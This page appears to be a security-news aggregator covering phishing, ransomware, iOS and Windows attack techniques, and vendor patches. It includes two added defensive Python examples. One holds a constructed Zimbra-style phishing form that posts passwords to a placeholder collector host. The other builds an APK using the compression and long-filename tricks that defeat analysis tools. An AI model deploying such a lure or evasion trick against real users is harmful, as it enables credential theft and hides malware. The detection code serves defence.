The War Room


Community for various OSINT news and subject matter for open discussion or dissemination elsewhere


Recapping the top stories from Black Hat and DEF CON

Unsurprisingly, it seems like AI was the talk of the town.


Experts devise an exploit for Apple iOS 16 that relies on fake Airplane Mode

Researchers detailed a new exploit for Apple iOS 16 that can allow attackers to retain access to a device even when the victim believes it is in Airplane Mode. Jamf Threat Labs researchers developed a post-exploit persistence technique on iOS 16 that tricks victims into believing that the device is in a functional Airplane Mode. In […]

The post Experts devise an exploit for Apple iOS 16 that relies on fake Airplane Mode appeared first on Security Affairs.


Phishing campaign steals accounts for Zimbra email servers worldwide


An ongoing phishing campaign has been underway since at least April 2023 that attempts to steal credentials for Zimbra Collaboration email servers worldwide.

According to a report by ESET, phishing emails are sent to organizations worldwide, with no specific focus on certain organizations or sectors. The threat actor behind this operation remains unknown at this time.

Targets heatmap (ESET)

Pretending to be Zimbra admins

According to the ESET researchers, the attacks start with a phishing email pretending to be from an organization's admin informing users of an imminent email server update, which will result in temporary account deactivation.

The recipient is requested to open an attached HTML file to learn more about the server upgrade and review instructions on avoiding the deactivation of accounts.

Phishing email content (ESET)

When opening the HTML attachment, a fake Zimbra login page will be shown that features the targeted company's logo and brand to appear authentic to the targets.

Also, the username field in the login form will be prefilled, further lending legitimacy to the phishing page.

Zimbra phishing page (ESET)

Account passwords entered in the phishing form are sent to the threat actor's server via an HTTPS POST request.

Code that exfiltrates user input (ESET)

ESET reports that in some instances, the attackers use compromised administrator accounts to create new mailboxes that are used for disseminating phishing emails to other members of the organization.

The analysts underline that despite the lack of sophistication of this campaign, its spread and success are impressive, and users of Zimbra Collaboration should be aware of the threat.

Zimbra servers under fire

Hackers commonly target Zimbra Collaboration email servers for cyber espionage to collect internal communications or use them as an initial point of breach to spread to the target organization's network.

Earlier this year, Proofpoint revealed that the Russian 'Winter Vivern' hacking group exploited a Zimbra Collaboration flaw (CVE-2022-27926) to access the webmail portals of NATO-aligned organizations, governments, diplomats, and military personnel.

Last year, Volexity reported that a threat actor named 'TEMP_Heretic' leveraged a then zero-day flaw (CVE-2022-23682) in the Zimbra Collaboration product to access mailboxes and perform lateral phishing attacks.

"The popularity of Zimbra Collaboration among organizations expected to have lower IT budgets ensures that it stays an attractive target for adversaries," concludes ESET.
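As an added example, not part of the ESET report or this article, the following mail-gateway style check parses an HTML attachment and flags any login form that would POST a password to a host outside the organisation's own domains, noting when the username field is prefilled as described above. The trusted host list, the sample attachment and the collector domain are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class CredentialFormScanner(HTMLParser):
    """Record each <form>: its action URL, whether it carries a password
    field, and whether a text/email field arrives already filled in."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""),
                          "password": False, "prefilled_user": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            kind = a.get("type", "text").lower()
            if kind == "password":
                self._form["password"] = True
            elif kind in ("text", "email") and a.get("value"):
                self._form["prefilled_user"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def audit_html_attachment(html: str, trusted_hosts) -> list:
    """Flag login forms that would submit a password to any host other than
    the organisation's own mail hosts (trusted_hosts, assumed known to the
    gateway). Relative actions are skipped: opened from an attachment they
    have no remote target. Script-driven exfiltration is not covered."""
    scanner = CredentialFormScanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        host = (urlparse(form["action"]).hostname or "").lower()
        if not host or any(host == t or host.endswith("." + t)
                           for t in trusted_hosts):
            continue
        note = f"credential form posts to external host {host}"
        if form["prefilled_user"]:
            note += " with username prefilled"
        findings.append(note)
    return findings


# Constructed lure mirroring the one described above; the collector domain is
# a placeholder, not an indicator taken from ESET's report.
SAMPLE_ATTACHMENT = """<html><body><h2>Example Corp webmail update</h2>
<form method="POST" action="https://collector.example.invalid/zimbra.php">
  <input type="text" name="username" value="j.doe@example.com">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form></body></html>"""
```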


Researchers Trick an iPhone Into Faking Airplane Mode

How mobile attackers could gaslight iPhone users, allowing the perfect cover for post-exploitation malicious activity.


NoFilter Attack: Sneaky Privilege Escalation Method Bypasses Windows Security

A previously undetected attack method called NoFilter has been found to abuse the Windows Filtering Platform (WFP) to achieve privilege escalation in the Windows operating system. "If an attacker has the ability to execute code with admin privilege and the target is to perform LSASS Shtinkering, these privileges are not enough," Ron Ben Yizhak, a security researcher at Deep Instinct, told The


LinkedIn Suffers 'Significant' Wave of Account Hacks

Users report losing access to their accounts, with some being pressured into paying a ransom to get back in or else face permanent account deletion.


An Overview of Dubai's First and Second Cybersecurity Strategy

Security demands a strong fortress in cyberspace, and Dubai has rolled out two cybersecurity strategies to protect the data of the government and citizens.


Google Brings AI Magic to Fuzz Testing With Eye-Opening Results

Google sprinkles magic of generative-AI into its open source fuzz testing infrastructure and finds immediate success with code coverage.

The post Google Brings AI Magic to Fuzz Testing With Eye-Opening Results appeared first on SecurityWeek.


Windows Task Manager refresh can be paused using CTRL key


A very useful and previously unknown Windows tip was revealed this week, where you can halt process jumping in Task Manager by holding down the Ctrl key on your keyboard, allowing easier access to a listed process.

The Windows Task Manager is one of the most useful built-in tools for managing your system, allowing you to terminate unresponsive applications and see what processes are using too much CPU, memory, and other resources.

However, when you sort by resources, like CPU utilization, and have many running processes, you will find that the processes jump around in the list due to constantly changing processor utilization.

This process jumping can make it hard to select a process or see a snapshot in time.

Task Manager process jumping
Source: BleepingComputer

This week, Microsoft Windows Program Manager Jen Gentleman shared a helpful tip on X (Twitter), saying that you can press and hold the Ctrl key on your keyboard to temporarily freeze the Task Manager refresh so you can better see what resources a process is using.

To let the process list auto-refresh again, simply release the Ctrl key.

Yesterday, Microsoft developer Dave Plummer shared that he was behind this useful feature, coding it so you can select processes that are jumping around.

"Someone finally noticed that if you hold down CTRL, the process list in Task Manager conveniently freezes so you can select rows without them jumping around," Plummer posted on X.

"I did this so you could sort by CPU and other dynamic columns but then still be able to click stuff..."

While it's possible to control the Task Manager refresh speed in the tool's settings, that is not nearly as helpful, since you can only pause the refresh entirely or set the refresh speed (Low, Normal, High).

However, with this new method, you can run the refresh speed on 'High' and then pause it as needed using the Ctrl key method.

BleepingComputer has tested this Task Manager tip and can confirm it works on Windows 7, Windows 10, and Windows 11.


China-Linked Bronze Starlight Group Targeting Gambling Sector with Cobalt Strike Beacons

An ongoing cyber attack campaign originating from China is targeting the Southeast Asian gambling sector to deploy Cobalt Strike beacons on compromised systems. Cybersecurity firm SentinelOne said the tactics, techniques, and procedures point to the involvement of a threat actor tracked as Bronze Starlight (aka Emperor Dragonfly or Storm-0401), which has been linked to the use of short-lived


ProjectDiscovery raises $25M to launch a cloud version of its threat-scanning platform

ProjectDiscovery, a platform that detects new, exploitable vulnerabilities in codebases, today announced that it raised $25 million in a Series A funding round led by CRV with participation from Point72, SignalFire, Rain Capital, Mango Capital, Accel and Lightspeed. ProjectDiscovery began as a collaboration between four security engineers — Rishiraj Sharma, Sandeep Singh, Nizamul Rana and […]


'Play' Ransomware Group Targeting MSPs Worldwide in New Campaign

Attackers use remote monitoring and management tools at MSPs to gain unfettered access to target networks.


Thousands of Android APKs use compression trick to thwart analysis


Threat actors increasingly distribute malicious Android APKs (packaged app installers) that resist decompilation using unsupported, unknown, or heavily tweaked compression algorithms.

The main advantage of this approach is to evade detection by security tools using static analysis and hamper examination by researchers, delaying the development of an in-depth understanding of how an Android malware strain works.

Zimperium, a member of the 'App Defense Alliance' dedicated to identifying and eliminating malware from Google Play, analyzed the decompilation resistance landscape after a Joe Security tweet that showcased an APK that eludes analysis yet runs seamlessly on Android devices.


A zLab report published yesterday claims 3,300 APKs are using these unusual anti-analysis methods, which might cause many of them to crash. However, the researchers found a subset of 71 malicious APKs that work fine on Android OS version 9 (API 28) and later.

Zimperium clarifies that none of these apps are on the Google Play store but lists their hashes at the bottom of the report to help people who source apps from third-party stores find and uninstall them.

Compression tricks

Android APKs use the ZIP format in two modes, one without compression and one using the DEFLATE algorithm.

APKs packed using unsupported or unknown compression methods are not installable on Android 8 and older, but they will work fine on Android versions 9 and later.

Zimperium tested the apps it sampled on decompressor tools like JADX, APKtool, and the macOS Archive Utility, and none of them could unzip the APK for analysis.

In addition to using unsupported compression methods, Zimperium also found that malicious APK authors use filenames longer than 256 bytes to crash analysis tools, corrupt the AndroidManifest.xml file for obfuscation, and use malformed String Pools to crash tools that parse Android XML files.

Exceedingly long filename (top), malformed string pool header (bottom) (Zimperium)

These are all anti-analysis techniques, and while Zimperium doesn't delve into what those malicious APKs do exactly, the intent to conceal their functions is unlikely to be benign.

Since APKs downloaded from outside Google Play cannot be vetted, the best way to protect against these threats is to avoid installing Android apps from third-party sites in the first place.

If you must install an app outside of Google Play, scan it with a reputable mobile AV tool before installation.

During app installation, pay attention to the requested permissions and look for any red flags unrelated to the app's core functionality.

Finally, "rooting" your Android device makes the user an administrator, allowing malicious APKs to run at the highest privileges on the OS, so this is generally discouraged.
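As an added example (not code from the Zimperium report or this article), the script below walks an APK's ZIP central directory by hand, so it does not depend on an unzipper that refuses the archive, and reports the two header-level tricks described above: a compression method other than stored or DEFLATE, and a file name longer than 256 bytes. The sample archive is constructed inside the script, and the 0x1234 method value is an arbitrary unassigned placeholder rather than one taken from the report.

```python
import io
import struct
import zipfile

# The two ZIP methods APKs legitimately use (page: stored and DEFLATE).
ANDROID_METHODS = {0: "stored", 8: "deflate"}
CD_SIG = 0x02014B50    # central directory file header signature
EOCD_SIG = 0x06054B50  # end of central directory record signature
MAX_NAME = 256         # page: names over 256 bytes crash analysis tools


def audit_apk(data: bytes) -> list:
    """Walk the ZIP central directory by hand, so no decompressor is involved,
    and report members with a non-Android compression method or an over-long
    file name. Returns (name_prefix, reason) pairs."""
    eocd = data.rfind(struct.pack("<I", EOCD_SIG))
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    # EOCD layout after the signature and disk fields: entries on this disk,
    # total entries, central directory size, central directory offset.
    total, _cd_size, pos = struct.unpack_from("<HII", data, eocd + 10)
    findings = []
    for _ in range(total):
        if struct.unpack_from("<I", data, pos)[0] != CD_SIG:
            findings.append(("", "central directory truncated or malformed"))
            break
        (method,) = struct.unpack_from("<H", data, pos + 10)
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        name = data[pos + 46:pos + 46 + name_len][:40].decode("utf-8", "replace")
        if method not in ANDROID_METHODS:
            findings.append((name, f"unsupported compression method {method}"))
        if name_len > MAX_NAME:
            findings.append((name, f"filename of {name_len} bytes"))
        pos += 46 + name_len + extra_len + comment_len
    return findings


def tools_can_unzip(data: bytes) -> bool:
    """What a stock unzipper does with such an archive: try to read every
    member and give up on the unknown method."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for info in z.infolist():
                z.read(info)
        return True
    except (NotImplementedError, zipfile.BadZipFile):
        return False


def build_sample() -> bytes:
    """Constructed APK-like archive (not one of the report's samples): the
    method field of classes.dex is patched to the unassigned value 0x1234 in
    both its local header and its central directory entry, and one asset is
    given a 307-byte name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"<manifest/>", zipfile.ZIP_DEFLATED)
        z.writestr("classes.dex", b"dex\n035\0" + b"\0" * 16, zipfile.ZIP_STORED)
        z.writestr("assets/" + "A" * 300, b"x", zipfile.ZIP_STORED)
    data = bytearray(buf.getvalue())
    lfh_name = data.find(b"classes.dex")               # local header: method at name-22
    cd_name = data.find(b"classes.dex", lfh_name + 1)  # central dir: method at name-36
    struct.pack_into("<H", data, lfh_name - 22, 0x1234)
    struct.pack_into("<H", data, cd_name - 36, 0x1234)
    return bytes(data)
```

Running `audit_apk(build_sample())` lists both tricks while `tools_can_unzip` on the same bytes returns False, which is the gap the report describes between what Android installs and what analysis tools can open.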


Triple Extortion Ransomware and the Cybercrime Supply Chain


Ransomware attacks continue to grow both in sophistication and quantity. 2023 has already seen more ransomware attacks involving data exfiltration and extortion than all of 2022, an increasing trend we expect to continue.

This article will explore the business model of ransomware groups and the complex cybercrime ecosystem that has sprung up around them.

The Rise of Triple Extortion Ransomware

Ransomware is traditionally associated with threat actors using encryption to lock companies out of their data, systems, and IT infrastructure. However, in recent years, ransomware groups have evolved their tactics to not only encrypt data but also exfiltrate it, making it a double-edged weapon for extortion.

This new approach allows them to not only hold organizations hostage by denying access to their own data, but also threaten to leak or sell the stolen information if the ransom demands are not met.

This shift in strategy has proven to be highly profitable for ransomware groups, as organizations are often willing to pay large sums to prevent the public exposure of their sensitive data, which allows groups to profit off of victims even if the victim has an effective backup and recovery system.

Ransomware group LockBit’s ransomware blog page
Source: Flare

If a victim doesn't pay, groups will often auction off the data, providing another method to monetize their work.

The rise of data extortion ransomware has coincided with a dramatic increase in both the number of groups active and the number of attacks against organizations. Data extortion was originally added to the arsenal of ransomware groups as a double extortion technique, to be used in addition to encryption.

However, recently many groups have begun resorting to triple extortion, in some cases blackmailing individual employees, harassing third-party organizations of the victim, and even DDoSing websites in addition to data encryption and exfiltration.

Ransomware Groups, Affiliates, and Triple Extortion

Ransomware groups don't operate alone. They often have a network of affiliates who help them carry out attacks and distribute the ransomware. These affiliates may specialize in different aspects of the attack, such as initial access, data exfiltration, or negotiation.

Affiliate programs enable groups to focus on developing new variants, negotiation, or other aspects of the attack, allowing for role specialization and a greater number of attacks over time.

And it's paying off; Flare has already detected more ransomware data disclosures in 2023 than in all of 2022, representing a steep increase in the number of attacks.

Ransomware group LockBit’s Affiliate Rules page
Source: Flare

Additionally, since we are looking at disclosure, we are likely only identifying a small number of the total attacks against organizations.

As the ecosystem has grown, we have seen that ransomware groups are becoming increasingly aggressive. Groups such as Karakurt have been documented as not only exfiltrating data but also harassing individual employees and even third parties within the organization.

Triple Extortion Ransomware in Context: The Broader Cybercrime Ecosystem

The broader cybercrime ecosystem also acts as a crucial enabler for ransomware groups by offering services like bulletproof hosting, money laundering, initial access to environments, and employee credentials via stealer logs.

We'll cover a few of the main ways that the broader cybercrime ecosystem intersects with ransomware groups:

Ransomware Groups and Initial Access Brokers

Initial access brokers (IABs) are commonly active on the dark web forums Exploit and XSS. IABs work to compromise corporate IT infrastructure, which they then auction off on specific dark web forums, often with a start price, a step price, and a "blitz" (buy-it-now) price.

An IAB advertises access to a European company for $250
Source: Flare

In many cases, we have seen access brokers advertise that they have access to a victim's backup and recovery systems or that the victim lacks backup and recovery, providing further evidence that IABs expect their listings to be used for ransomware.

Stealer Logs: A Key Vector for Ransomware

Stealer logs likely represent another critical source of initial access to IT environments for ransomware groups. Stealer logs are the result of an infostealer malware infection.

These logs contain valuable information such as usernames, passwords, and other credentials that can be used to gain unauthorized access to systems.

Ransomware groups may acquire these logs from Telegram channels, dark web forums, or marketplaces, enabling them to bypass traditional methods of gaining access to a victim's network.

In a recent Flare analysis, we found more than 50,000 stealer logs that contained credentials to corporate single sign-on applications. Stealer logs also include active session cookies, which can be used to bypass MFA controls.

0-Days and Dark Web Marketplaces

The ransomware group CL0P exploited a 0-day in MOVEit to enormous advantage, resulting in hundreds of victims and billions of dollars in damages.

0-days are likely one of the least common forms of access that ransomware groups use, due to the sophistication required to find and leverage them and the fact that there are far easier ways to facilitate an infection.

However, numerous dark web marketplaces, forums, and Telegram channels do facilitate sales of alleged 0-day exploits.

Threat actor advertises python exploit
Source: Flare

More sophisticated ransomware groups will also likely source their own vulnerabilities rather than purchasing existing ones.

Ransomware is on the Rise

Data extortion ransomware schemes continue to explode in popularity, with new groups arising on a monthly basis and dozens of new victim organizations every week.

Building an effective continuous threat exposure management process that enables automated detection of stealer logs, ransom blog mentions, and illicit Telegram channels, along with monitoring of other cybercrime forums, has never been more important than now.

Ransomware Detection & Remediation with Flare

Flare currently monitors more than 50 ransomware groups that are actively engaged in double and triple extortion schemes. Flare’s easy-to-use SaaS platform automates detecting company-specific threats across the clear & dark web and illicit Telegram channels.

Sign up for a free trial to learn more about how Flare can boost your security program’s cybercrime monitoring capabilities in 30 minutes.

Sponsored and written by Flare


Rapid7 Says ROI for Ransomware Remains High; Zero-Day Usage Expands

A new report from Rapid7 says a ransomware gang like Cl0p would easily be able to afford a bevy of zero-day exploits for vulnerable enterprise software.

The post Rapid7 Says ROI for Ransomware Remains High; Zero-Day Usage Expands appeared first on SecurityWeek.


Malicious QR Codes Used in Phishing Attack Targeting US Energy Company

A widespread phishing campaign utilizing malicious QR codes has hit organizations in various industries, including a major energy company in the US.

The post Malicious QR Codes Used in Phishing Attack Targeting US Energy Company appeared first on SecurityWeek.


New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode

Cybersecurity researchers have documented a novel post-exploit persistence technique on iOS 16 that could be abused to fly under the radar and maintain access to an Apple device even when the victim believes it is offline. The method "tricks the victim into thinking their device's Airplane Mode works when in reality the attacker (following successful device exploit) has planted an artificial


New LABRAT Campaign Exploits GitLab Flaw for Cryptojacking and Proxyjacking Activities

A new, financially motivated operation dubbed LABRAT has been observed weaponizing a now-patched critical flaw in GitLab as part of a cryptojacking and proxyjacking campaign. "The attacker utilized undetected signature-based tools, sophisticated and stealthy cross-platform malware, command-and-control (C2) tools which bypassed firewalls, and kernel-based rootkits to hide their presence," Sysdig


Atlassian Releases Security Update for Confluence Server and Data Center

Atlassian has released its security bulletin for August 2023 to address a vulnerability in Confluence Server and Data Center, CVE-2023-28709. A remote attacker can exploit this vulnerability to cause a denial-of-service condition.

CISA encourages users and administrators to review Atlassian’s August 2023 Security Bulletin and apply the necessary update.


Cisco Patches High-Severity Vulnerabilities in Enterprise Applications

Cisco has patched high-severity vulnerabilities in enterprise applications that could lead to privilege escalation, SQL injection, and denial-of-service.

The post Cisco Patches High-Severity Vulnerabilities in Enterprise Applications appeared first on SecurityWeek.


RogueSliver: disrupt campaigns using the Sliver C2 framework

RogueSliver A suite of tools to disrupt campaigns using the Sliver C2 framework. This tool, its uses, and how it was created will be covered in depth on ACEResponder.com This tool is for educational purposes...

The post RogueSliver: disrupt campaigns using the Sliver C2 framework appeared first on Penetration Testing.


How Innovation Accelerators Are at Work on the Dark Side

Digital commerce remains the richest target for cybercriminals, yet physical payment threats remain strong.


H1 2023: Ransomware's Pivot to Linux and Vulnerable Drivers

This report examines trends in malware use, distribution, and development, as well as high-risk vulnerabilities disclosed by major hardware and software vendors between January 1 and June 30, 2023.


CISA says hackers are exploiting a new file transfer bug in Citrix ShareFile

Hackers are exploiting a newly discovered vulnerability in yet another enterprise file transfer software, the U.S. government’s cybersecurity agency has warned. CISA on Wednesday added a vulnerability in Citrix ShareFile, tracked as CVE-2023-24489, to its Known Exploited Vulnerabilities (KEV) catalog. The agency warned that the flaw poses “significant risks to the federal enterprise,” and mandated […]


Cyber Defenders Lead the AI Arms Race for Now

Cyber attackers are slow to implement AI in their attack chains, according to Mandiant's analysis.
